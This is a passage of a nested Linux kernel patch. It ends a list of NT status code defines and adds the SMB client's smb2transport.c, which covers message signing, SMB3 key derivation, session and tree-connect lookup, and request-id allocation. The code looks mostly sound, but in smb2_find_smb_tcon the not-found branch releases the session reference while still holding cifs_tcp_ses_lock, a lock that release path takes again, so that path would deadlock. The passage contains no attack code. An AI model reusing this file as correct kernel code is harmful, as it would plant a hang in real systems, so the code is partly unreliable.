++#define STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT cpu_to_le32(0xC022002F)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_METHOD cpu_to_le32(0xC0220030)
++#define STATUS_FWP_INCOMPATIBLE_DH_GROUP cpu_to_le32(0xC0220031)
++#define STATUS_FWP_EM_NOT_SUPPORTED cpu_to_le32(0xC0220032)
++#define STATUS_FWP_NEVER_MATCH cpu_to_le32(0xC0220033)
++#define STATUS_FWP_PROVIDER_CONTEXT_MISMATCH cpu_to_le32(0xC0220034)
++#define STATUS_FWP_INVALID_PARAMETER cpu_to_le32(0xC0220035)
++#define STATUS_FWP_TOO_MANY_SUBLAYERS cpu_to_le32(0xC0220036)
++#define STATUS_FWP_CALLOUT_NOTIFICATION_FAILED cpu_to_le32(0xC0220037)
++#define STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG cpu_to_le32(0xC0220038)
++#define STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG cpu_to_le32(0xC0220039)
++#define STATUS_FWP_TCPIP_NOT_READY cpu_to_le32(0xC0220100)
++#define STATUS_FWP_INJECT_HANDLE_CLOSING cpu_to_le32(0xC0220101)
++#define STATUS_FWP_INJECT_HANDLE_STALE cpu_to_le32(0xC0220102)
++#define STATUS_FWP_CANNOT_PEND cpu_to_le32(0xC0220103)
++#define STATUS_NDIS_CLOSING cpu_to_le32(0xC0230002)
++#define STATUS_NDIS_BAD_VERSION cpu_to_le32(0xC0230004)
++#define STATUS_NDIS_BAD_CHARACTERISTICS cpu_to_le32(0xC0230005)
++#define STATUS_NDIS_ADAPTER_NOT_FOUND cpu_to_le32(0xC0230006)
++#define STATUS_NDIS_OPEN_FAILED cpu_to_le32(0xC0230007)
++#define STATUS_NDIS_DEVICE_FAILED cpu_to_le32(0xC0230008)
++#define STATUS_NDIS_MULTICAST_FULL cpu_to_le32(0xC0230009)
++#define STATUS_NDIS_MULTICAST_EXISTS cpu_to_le32(0xC023000A)
++#define STATUS_NDIS_MULTICAST_NOT_FOUND cpu_to_le32(0xC023000B)
++#define STATUS_NDIS_REQUEST_ABORTED cpu_to_le32(0xC023000C)
++#define STATUS_NDIS_RESET_IN_PROGRESS cpu_to_le32(0xC023000D)
++#define STATUS_NDIS_INVALID_PACKET cpu_to_le32(0xC023000F)
++#define STATUS_NDIS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0230010)
++#define STATUS_NDIS_ADAPTER_NOT_READY cpu_to_le32(0xC0230011)
++#define STATUS_NDIS_INVALID_LENGTH cpu_to_le32(0xC0230014)
++#define STATUS_NDIS_INVALID_DATA cpu_to_le32(0xC0230015)
++#define STATUS_NDIS_BUFFER_TOO_SHORT cpu_to_le32(0xC0230016)
++#define STATUS_NDIS_INVALID_OID cpu_to_le32(0xC0230017)
++#define STATUS_NDIS_ADAPTER_REMOVED cpu_to_le32(0xC0230018)
++#define STATUS_NDIS_UNSUPPORTED_MEDIA cpu_to_le32(0xC0230019)
++#define STATUS_NDIS_GROUP_ADDRESS_IN_USE cpu_to_le32(0xC023001A)
++#define STATUS_NDIS_FILE_NOT_FOUND cpu_to_le32(0xC023001B)
++#define STATUS_NDIS_ERROR_READING_FILE cpu_to_le32(0xC023001C)
++#define STATUS_NDIS_ALREADY_MAPPED cpu_to_le32(0xC023001D)
++#define STATUS_NDIS_RESOURCE_CONFLICT cpu_to_le32(0xC023001E)
++#define STATUS_NDIS_MEDIA_DISCONNECTED cpu_to_le32(0xC023001F)
++#define STATUS_NDIS_INVALID_ADDRESS cpu_to_le32(0xC0230022)
++#define STATUS_NDIS_PAUSED cpu_to_le32(0xC023002A)
++#define STATUS_NDIS_INTERFACE_NOT_FOUND cpu_to_le32(0xC023002B)
++#define STATUS_NDIS_UNSUPPORTED_REVISION cpu_to_le32(0xC023002C)
++#define STATUS_NDIS_INVALID_PORT cpu_to_le32(0xC023002D)
++#define STATUS_NDIS_INVALID_PORT_STATE cpu_to_le32(0xC023002E)
++#define STATUS_NDIS_LOW_POWER_STATE cpu_to_le32(0xC023002F)
++#define STATUS_NDIS_NOT_SUPPORTED cpu_to_le32(0xC02300BB)
++#define STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED cpu_to_le32(0xC0232000)
++#define STATUS_NDIS_DOT11_MEDIA_IN_USE cpu_to_le32(0xC0232001)
++#define STATUS_NDIS_DOT11_POWER_STATE_INVALID cpu_to_le32(0xC0232002)
++#define STATUS_IPSEC_BAD_SPI cpu_to_le32(0xC0360001)
++#define STATUS_IPSEC_SA_LIFETIME_EXPIRED cpu_to_le32(0xC0360002)
++#define STATUS_IPSEC_WRONG_SA cpu_to_le32(0xC0360003)
++#define STATUS_IPSEC_REPLAY_CHECK_FAILED cpu_to_le32(0xC0360004)
++#define STATUS_IPSEC_INVALID_PACKET cpu_to_le32(0xC0360005)
++#define STATUS_IPSEC_INTEGRITY_CHECK_FAILED cpu_to_le32(0xC0360006)
++#define STATUS_IPSEC_CLEAR_TEXT_DROP cpu_to_le32(0xC0360007)
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+new file mode 100644
+index 0000000000000..790acf65a0926
+--- /dev/null
++++ b/fs/smb/client/smb2transport.c
+@@ -0,0 +1,934 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002, 2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Jeremy Allison (jra@samba.org) 2006
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/list.h>
++#include <linux/wait.h>
++#include <linux/net.h>
++#include <linux/delay.h>
++#include <linux/uaccess.h>
++#include <asm/processor.h>
++#include <linux/mempool.h>
++#include <linux/highmem.h>
++#include <crypto/aead.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_debug.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++
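++/*
++ * Allocate the HMAC-SHA256 and AES-CMAC shash transforms used for
++ * SMB3 signing and signing-key generation.  If the CMAC allocation
++ * fails, the already-allocated HMAC-SHA256 transform is freed.
++ */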
++static int
++smb3_crypto_shash_allocate(struct TCP_Server_Info *server)
++{
++	struct cifs_secmech *p = &server->secmech;
++	int rc;
++
++	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
++	if (rc)
++		goto err;
++
++	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
++	if (rc)
++		goto err;
++
++	return 0;
++err:
++	cifs_free_hash(&p->hmacsha256);
++	return rc;
++}
++
++int
++smb311_crypto_shash_allocate(struct TCP_Server_Info *server)
++{
++	struct cifs_secmech *p = &server->secmech;
++	int rc = 0;
++
++	rc = cifs_alloc_hash("hmac(sha256)", &p->hmacsha256);
++	if (rc)
++		return rc;
++
++	rc = cifs_alloc_hash("cmac(aes)", &p->aes_cmac);
++	if (rc)
++		goto err;
++
++	rc = cifs_alloc_hash("sha512", &p->sha512);
++	if (rc)
++		goto err;
++
++	return 0;
++
++err:
++	cifs_free_hash(&p->aes_cmac);
++	cifs_free_hash(&p->hmacsha256);
++	return rc;
++}
++
++static
++int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
++{
++	struct cifs_chan *chan;
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses = NULL;
++	int i;
++	int rc = 0;
++	bool is_binding = false;
++
++	spin_lock(&cifs_tcp_ses_lock);
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (ses->Suid == ses_id)
++			goto found;
++	}
++	cifs_server_dbg(VFS, "%s: Could not find session 0x%llx\n",
++			__func__, ses_id);
++	rc = -ENOENT;
++	goto out;
++
++found:
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++	if (is_binding) {
++		/*
++		 * If we are in the process of binding a new channel
++		 * to an existing session, use the master connection
++		 * session key
++		 */
++		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		goto out;
++	}
++
++	/*
++	 * Otherwise, use the channel key.
++	 */
++
++	for (i = 0; i < ses->chan_count; i++) {
++		chan = ses->chans + i;
++		if (chan->server == server) {
++			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
++			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
++			goto out;
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	cifs_dbg(VFS,
++		 "%s: Could not find channel signing key for session 0x%llx\n",
++		 __func__, ses_id);
++	rc = -ENOENT;
++
++out:
++	spin_unlock(&cifs_tcp_ses_lock);
++	return rc;
++}
++
++static struct cifs_ses *
++smb2_find_smb_ses_unlocked(struct TCP_Server_Info *server, __u64 ses_id)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		if (ses->Suid != ses_id)
++			continue;
++		++ses->ses_count;
++		return ses;
++	}
++
++	return NULL;
++}
++
++struct cifs_ses *
++smb2_find_smb_ses(struct TCP_Server_Info *server, __u64 ses_id)
++{
++	struct cifs_ses *ses;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	ses = smb2_find_smb_ses_unlocked(server, ses_id);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	return ses;
++}
++
++static struct cifs_tcon *
++smb2_find_smb_sess_tcon_unlocked(struct cifs_ses *ses, __u32  tid)
++{
++	struct cifs_tcon *tcon;
++
++	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++		if (tcon->tid != tid)
++			continue;
++		++tcon->tc_count;
++		return tcon;
++	}
++
++	return NULL;
++}
++
++/*
++ * Obtain tcon corresponding to the tid in the given
++ * cifs_ses
++ */
++
++struct cifs_tcon *
++smb2_find_smb_tcon(struct TCP_Server_Info *server, __u64 ses_id, __u32  tid)
++{
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	ses = smb2_find_smb_ses_unlocked(server, ses_id);
++	if (!ses) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return NULL;
++	}
++	tcon = smb2_find_smb_sess_tcon_unlocked(ses, tid);
++	if (!tcon) {
++		cifs_put_smb_ses(ses);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return NULL;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	/* tcon already has a ref to ses, so we don't need ses anymore */
++	cifs_put_smb_ses(ses);
++
++	return tcon;
++}
++
++int
++smb2_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++			bool allocate_crypto)
++{
++	int rc;
++	unsigned char smb2_signature[SMB2_HMACSHA256_SIZE];
++	unsigned char *sigptr = smb2_signature;
++	struct kvec *iov = rqst->rq_iov;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
++	struct cifs_ses *ses;
++	struct shash_desc *shash = NULL;
++	struct smb_rqst drqst;
++
++	ses = smb2_find_smb_ses(server, le64_to_cpu(shdr->SessionId));
++	if (unlikely(!ses)) {
++		cifs_server_dbg(VFS, "%s: Could not find session\n", __func__);
++		return -ENOENT;
++	}
++
++	memset(smb2_signature, 0x0, SMB2_HMACSHA256_SIZE);
++	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
++
++	if (allocate_crypto) {
++		rc = cifs_alloc_hash("hmac(sha256)", &shash);
++		if (rc) {
++			cifs_server_dbg(VFS,
++					"%s: sha256 alloc failed\n", __func__);
++			goto out;
++		}
++	} else {
++		shash = server->secmech.hmacsha256;
++	}
++
++	rc = crypto_shash_setkey(shash->tfm, ses->auth_key.response,
++			SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS,
++				"%s: Could not update with response\n",
++				__func__);
++		goto out;
++	}
++
++	rc = crypto_shash_init(shash);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not init sha256", __func__);
++		goto out;
++	}
++
++	/*
++	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
++	 * data, that is, iov[0] should not contain an rfc1002 length.
++	 *
++	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
++	 * __cifs_calc_signature().
++	 */
++	drqst = *rqst;
++	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
++		rc = crypto_shash_update(shash, iov[0].iov_base,
++					 iov[0].iov_len);
++		if (rc) {
++			cifs_server_dbg(VFS,
++					"%s: Could not update with payload\n",
++					__func__);
++			goto out;
++		}
++		drqst.rq_iov++;
++		drqst.rq_nvec--;
++	}
++
++	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
++	if (!rc)
++		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
++
++out:
++	if (allocate_crypto)
++		cifs_free_hash(&shash);
++	if (ses)
++		cifs_put_smb_ses(ses);
++	return rc;
++}
++
++static int generate_key(struct cifs_ses *ses, struct kvec label,
++			struct kvec context, __u8 *key, unsigned int key_size)
++{
++	unsigned char zero = 0x0;
++	__u8 i[4] = {0, 0, 0, 1};
++	__u8 L128[4] = {0, 0, 0, 128};
++	__u8 L256[4] = {0, 0, 1, 0};
++	int rc = 0;
++	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
++	unsigned char *hashptr = prfhash;
++	struct TCP_Server_Info *server = ses->server;
++
++	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
++	memset(key, 0x0, key_size);
++
++	rc = smb3_crypto_shash_allocate(server);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_setkey(server->secmech.hmacsha256->tfm,
++		ses->auth_key.response, SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not set with session key\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_init(server->secmech.hmacsha256);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not init sign hmac\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, i, 4);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with n\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, label.iov_base, label.iov_len);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with label\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, &zero, 1);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with zero\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(server->secmech.hmacsha256, context.iov_base, context.iov_len);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with context\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
++		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
++		rc = crypto_shash_update(server->secmech.hmacsha256, L256, 4);
++	} else {
++		rc = crypto_shash_update(server->secmech.hmacsha256, L128, 4);
++	}
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not update with L\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_final(server->secmech.hmacsha256, hashptr);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not generate sha256 hash\n", __func__);
++		goto smb3signkey_ret;
++	}
++
++	memcpy(key, hashptr, key_size);
++
++smb3signkey_ret:
++	return rc;
++}
++
++struct derivation {
++	struct kvec label;
++	struct kvec context;
++};
++
++struct derivation_triplet {
++	struct derivation signing;
++	struct derivation encryption;
++	struct derivation decryption;
++};
++
++static int
++generate_smb3signingkey(struct cifs_ses *ses,
++			struct TCP_Server_Info *server,
++			const struct derivation_triplet *ptriplet)
++{
++	int rc;
++	bool is_binding = false;
++	int chan_index = 0;
++
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++
++	chan_index = cifs_ses_get_chan_index(ses, server);
++	/* TODO: introduce ref counting for channels when they can be freed */
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	/*
++	 * All channels use the same encryption/decryption keys but
++	 * they have their own signing key.
++	 *
++	 * When we generate the keys, check if it is for a new channel
++	 * (binding) in which case we only need to generate a signing
++	 * key and store it in the channel so as not to overwrite the
++	 * master connection signing key stored in the session
++	 */
++
++	if (is_binding) {
++		rc = generate_key(ses, ptriplet->signing.label,
++				  ptriplet->signing.context,
++				  ses->chans[chan_index].signkey,
++				  SMB3_SIGN_KEY_SIZE);
++		if (rc)
++			return rc;
++	} else {
++		rc = generate_key(ses, ptriplet->signing.label,
++				  ptriplet->signing.context,
++				  ses->smb3signingkey,
++				  SMB3_SIGN_KEY_SIZE);
++		if (rc)
++			return rc;
++
++		/* safe to access primary channel, since it will never go away */
++		spin_lock(&ses->chan_lock);
++		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
++		       SMB3_SIGN_KEY_SIZE);
++		spin_unlock(&ses->chan_lock);
++
++		rc = generate_key(ses, ptriplet->encryption.label,
++				  ptriplet->encryption.context,
++				  ses->smb3encryptionkey,
++				  SMB3_ENC_DEC_KEY_SIZE);
++		if (rc)
++			return rc;
++
++		rc = generate_key(ses, ptriplet->decryption.label,
++				  ptriplet->decryption.context,
++				  ses->smb3decryptionkey,
++				  SMB3_ENC_DEC_KEY_SIZE);
++		if (rc)
++			return rc;
++	}
++
++#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
++	cifs_dbg(VFS, "%s: dumping generated AES session keys\n", __func__);
++	/*
++	 * The session id is opaque in terms of endianness, so we can't
++	 * print it as a long long. We dump it as we got it on the wire.
++	 */
++	cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
++			&ses->Suid);
++	cifs_dbg(VFS, "Cipher type   %d\n", server->cipher_type);
++	cifs_dbg(VFS, "Session Key   %*ph\n",
++		 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
++	cifs_dbg(VFS, "Signing Key   %*ph\n",
++		 SMB3_SIGN_KEY_SIZE, ses->smb3signingkey);
++	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
++		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
++		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
++				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3encryptionkey);
++		cifs_dbg(VFS, "ServerOut Key %*ph\n",
++				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3decryptionkey);
++	} else {
++		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
++				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3encryptionkey);
++		cifs_dbg(VFS, "ServerOut Key %*ph\n",
++				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3decryptionkey);
++	}
++#endif
++	return rc;
++}
++
++int
++generate_smb30signingkey(struct cifs_ses *ses,
++			 struct TCP_Server_Info *server)
++{
++	struct derivation_triplet triplet;
++	struct derivation *d;
++
++	d = &triplet.signing;
++	d->label.iov_base = "SMB2AESCMAC";
++	d->label.iov_len = 12;
++	d->context.iov_base = "SmbSign";
++	d->context.iov_len = 8;
++
++	d = &triplet.encryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerIn ";
++	d->context.iov_len = 10;
++
++	d = &triplet.decryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerOut";
++	d->context.iov_len = 10;
++
++	return generate_smb3signingkey(ses, server, &triplet);
++}
++
++int
++generate_smb311signingkey(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++{
++	struct derivation_triplet triplet;
++	struct derivation *d;
++
++	d = &triplet.signing;
++	d->label.iov_base = "SMBSigningKey";
++	d->label.iov_len = 14;
++	d->context.iov_base = ses->preauth_sha_hash;
++	d->context.iov_len = 64;
++
++	d = &triplet.encryption;
++	d->label.iov_base = "SMBC2SCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = ses->preauth_sha_hash;
++	d->context.iov_len = 64;
++
++	d = &triplet.decryption;
++	d->label.iov_base = "SMBS2CCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = ses->preauth_sha_hash;
++	d->context.iov_len = 64;
++
++	return generate_smb3signingkey(ses, server, &triplet);
++}
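++/*
++ * Note: the iov_len values above count each string's trailing NUL
++ * (e.g. "SMB2AESCMAC" is 11 characters, iov_len 12), matching the
++ * key-derivation labels in MS-SMB2 3.1.4.2.  For SMB 3.1.1 the
++ * context is the 64-byte preauth integrity hash rather than a fixed
++ * string.
++ */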
++
++int
++smb3_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++			bool allocate_crypto)
++{
++	int rc;
++	unsigned char smb3_signature[SMB2_CMACAES_SIZE];
++	unsigned char *sigptr = smb3_signature;
++	struct kvec *iov = rqst->rq_iov;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
++	struct shash_desc *shash = NULL;
++	struct smb_rqst drqst;
++	u8 key[SMB3_SIGN_KEY_SIZE];
++
++	rc = smb2_get_sign_key(le64_to_cpu(shdr->SessionId), server, key);
++	if (unlikely(rc)) {
++		cifs_server_dbg(VFS, "%s: Could not get signing key\n", __func__);
++		return rc;
++	}
++
++	if (allocate_crypto) {
++		rc = cifs_alloc_hash("cmac(aes)", &shash);
++		if (rc)
++			return rc;
++	} else {
++		shash = server->secmech.aes_cmac;
++	}
++
++	memset(smb3_signature, 0x0, SMB2_CMACAES_SIZE);
++	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
++
++	rc = crypto_shash_setkey(shash->tfm, key, SMB2_CMACAES_SIZE);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not set key for cmac aes\n", __func__);
++		goto out;
++	}
++
++	/*
++	 * We already allocated aes_cmac when we initialized the smb3
++	 * signing key, so unlike the smb2 case we do not have to check
++	 * here whether the secmech is initialized.
++	 */
++	rc = crypto_shash_init(shash);
++	if (rc) {
++		cifs_server_dbg(VFS, "%s: Could not init cmac aes\n", __func__);
++		goto out;
++	}
++
++	/*
++	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
++	 * data, that is, iov[0] should not contain an rfc1002 length.
++	 *
++	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
++	 * __cifs_calc_signature().
++	 */
++	drqst = *rqst;
++	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
++		rc = crypto_shash_update(shash, iov[0].iov_base,
++					 iov[0].iov_len);
++		if (rc) {
++			cifs_server_dbg(VFS, "%s: Could not update with payload\n",
++				 __func__);
++			goto out;
++		}
++		drqst.rq_iov++;
++		drqst.rq_nvec--;
++	}
++
++	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
++	if (!rc)
++		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
++
++out:
++	if (allocate_crypto)
++		cifs_free_hash(&shash);
++	return rc;
++}
++
++/* must be called with server->srv_mutex held */
++static int
++smb2_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	struct smb2_hdr *shdr;
++	struct smb2_sess_setup_req *ssr;
++	bool is_binding;
++	bool is_signed;
++
++	shdr = (struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++	ssr = (struct smb2_sess_setup_req *)shdr;
++
++	is_binding = shdr->Command == SMB2_SESSION_SETUP &&
++		(ssr->Flags & SMB2_SESSION_REQ_FLAG_BINDING);
++	is_signed = shdr->Flags & SMB2_FLAGS_SIGNED;
++
++	if (!is_signed)
++		return 0;
++	spin_lock(&server->srv_lock);
++	if (server->ops->need_neg &&
++	    server->ops->need_neg(server)) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	spin_unlock(&server->srv_lock);
++	if (!is_binding && !server->session_estab) {
++		strncpy(shdr->Signature, "BSRSPYL", 8);
++		return 0;
++	}
++
++	rc = server->ops->calc_signature(rqst, server, false);
++
++	return rc;
++}
++
++int
++smb2_verify_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server)
++{
++	int rc;
++	char server_response_sig[SMB2_SIGNATURE_SIZE];
++	struct smb2_hdr *shdr =
++			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
++
++	if ((shdr->Command == SMB2_NEGOTIATE) ||
++	    (shdr->Command == SMB2_SESSION_SETUP) ||
++	    (shdr->Command == SMB2_OPLOCK_BREAK) ||
++	    server->ignore_signature ||
++	    (!server->session_estab))
++		return 0;
++
++	/*
++	 * BB what if signatures are supposed to be on for session but
++	 * server does not send one? BB
++	 */
++
++	/* Do not need to verify session setups with signature "BSRSPYL " */
++	if (memcmp(shdr->Signature, "BSRSPYL ", 8) == 0)
++		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
++			 shdr->Command);
++
++	/*
++	 * Save off the original signature so we can modify the smb and check
++	 * our calculated signature against what the server sent.
++	 */
++	memcpy(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE);
++
++	memset(shdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++
++	rc = server->ops->calc_signature(rqst, server, true);
++
++	if (rc)
++		return rc;
++
++	if (memcmp(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE)) {
++		cifs_dbg(VFS, "sign fail cmd 0x%x message id 0x%llx\n",
++			shdr->Command, shdr->MessageId);
++		return -EACCES;
++	}
++	return 0;
++}
++
++/*
++ * Set message id for the request. Should be called after wait_for_free_request
++ * and when srv_mutex is held.
++ */
++static inline void
++smb2_seq_num_into_buf(struct TCP_Server_Info *server,
++		      struct smb2_hdr *shdr)
++{
++	unsigned int i, num = le16_to_cpu(shdr->CreditCharge);
++
++	shdr->MessageId = get_next_mid64(server);
++	/* skip message numbers according to CreditCharge field */
++	for (i = 1; i < num; i++)
++		get_next_mid(server);
++}
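++/*
++ * Example: a request with CreditCharge = 3 consumes MessageIds N,
++ * N+1 and N+2; get_next_mid64() above returns N and the loop burns
++ * the remaining two, so the next request starts at N+3.
++ */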
++
++static struct mid_q_entry *
++smb2_mid_entry_alloc(const struct smb2_hdr *shdr,
++		     struct TCP_Server_Info *server)
++{
++	struct mid_q_entry *temp;
++	unsigned int credits = le16_to_cpu(shdr->CreditCharge);
++
++	if (server == NULL) {
++		cifs_dbg(VFS, "Null TCP session in smb2_mid_entry_alloc\n");
++		return NULL;
++	}
++
++	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
++	memset(temp, 0, sizeof(struct mid_q_entry));
++	kref_init(&temp->refcount);
++	temp->mid = le64_to_cpu(shdr->MessageId);
++	temp->credits = credits > 0 ? credits : 1;
++	temp->pid = current->pid;
++	temp->command = shdr->Command; /* Always LE */
++	temp->when_alloc = jiffies;
++	temp->server = server;
++
++	/*
++	 * The default is for the mid to be synchronous, so the
++	 * default callback just wakes up the current task.
++	 */
++	get_task_struct(current);
++	temp->creator = current;
++	temp->callback = cifs_wake_up_task;
++	temp->callback_data = current;
++
++	atomic_inc(&mid_count);
++	temp->mid_state = MID_REQUEST_ALLOCATED;
++	trace_smb3_cmd_enter(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			     le64_to_cpu(shdr->SessionId),
++			     le16_to_cpu(shdr->Command), temp->mid);
++	return temp;
++}
++
++static int
++smb2_get_mid_entry(struct cifs_ses *ses, struct TCP_Server_Info *server,
++		   struct smb2_hdr *shdr, struct mid_q_entry **mid)
++{
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++
++	if (server->tcpStatus == CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		cifs_dbg(FYI, "tcp session dead - return to caller to retry\n");
++		return -EAGAIN;
++	}
++
++	if (server->tcpStatus == CifsNeedNegotiate &&
++	   shdr->Command != SMB2_NEGOTIATE) {
++		spin_unlock(&server->srv_lock);
++		return -EAGAIN;
++	}
++	spin_unlock(&server->srv_lock);
++
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_NEW) {
++		if ((shdr->Command != SMB2_SESSION_SETUP) &&
++		    (shdr->Command != SMB2_NEGOTIATE)) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are setting up session */
++	}
++
++	if (ses->ses_status == SES_EXITING) {
++		if (shdr->Command != SMB2_LOGOFF) {
++			spin_unlock(&ses->ses_lock);
++			return -EAGAIN;
++		}
++		/* else ok - we are shutting down the session */
++	}
++	spin_unlock(&ses->ses_lock);
++
++	*mid = smb2_mid_entry_alloc(shdr, server);
++	if (*mid == NULL)
++		return -ENOMEM;
++	spin_lock(&server->mid_lock);
++	list_add_tail(&(*mid)->qhead, &server->pending_mid_q);
++	spin_unlock(&server->mid_lock);
++
++	return 0;
++}
++
++int
